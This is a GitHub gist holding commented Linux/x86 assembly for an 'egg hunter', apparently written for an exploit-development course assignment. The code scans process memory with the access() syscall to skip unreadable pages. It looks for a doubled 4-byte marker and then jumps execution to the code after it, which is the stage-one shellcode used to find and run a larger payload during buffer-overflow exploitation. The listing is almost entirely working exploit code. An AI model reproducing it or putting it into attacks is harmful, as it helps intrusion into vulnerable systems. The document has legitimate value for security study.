Last active
November 27, 2023 06:41
-
-
Save geyslan/5254380 to your computer and use it in GitHub Desktop.
Egg Hunter in Assembly Language - Linux/x86 - forlife
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/3rd.assignment/egg_hunter.asm | |
| global _start | |
| section .text | |
| _start: | |
| ; setting the registers | |
| cld ; clear the direction flag (DF) to use scasd correctly | |
| xor ecx, ecx | |
| mul ecx | |
| alignpage: | |
| ; align page | |
| or dx, 0xfff ; is the same as "add dx, 4095" (PAGE_SIZE) | |
| alignbyte: | |
| inc edx ; next memory offset | |
| ; Accessing the memory offset | |
| ; int access(const char *pathname, int mode); | |
| ; access(memoryaddress, 0) | |
| push 33 ; __NR_access 33 | |
| pop eax | |
| lea ebx, [edx + 4] ; alignment to validate the last four bytes of the signature | |
| ; ecx already contains 0 (F_OK) | |
| int 0x80 ; kernel interruption | |
| ; verifies if memory is not readable (bad address = EFAULT = 0xf2 = -14) | |
| ; as the offset is not from a path name, access will never result 0, so we have to compare the error result with 0xf2 | |
| cmp al, 0xf2 | |
| ; if is not, loop | |
| jz alignpage | |
| ; compares the signature and increments 4 bytes in edi | |
| mov eax, 0x50905090 ; byte reverse order | |
| mov edi, edx | |
| scasd | |
| ; if is not equal, loop | |
| jnz alignbyte | |
| ; if is equal, compares the last signature 4 bytes and increments 4 bytes in edi again | |
| scasd | |
| ; if is not equal, loop | |
| jnz alignbyte | |
| ; if is equal, eat the egg | |
| jmp edi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment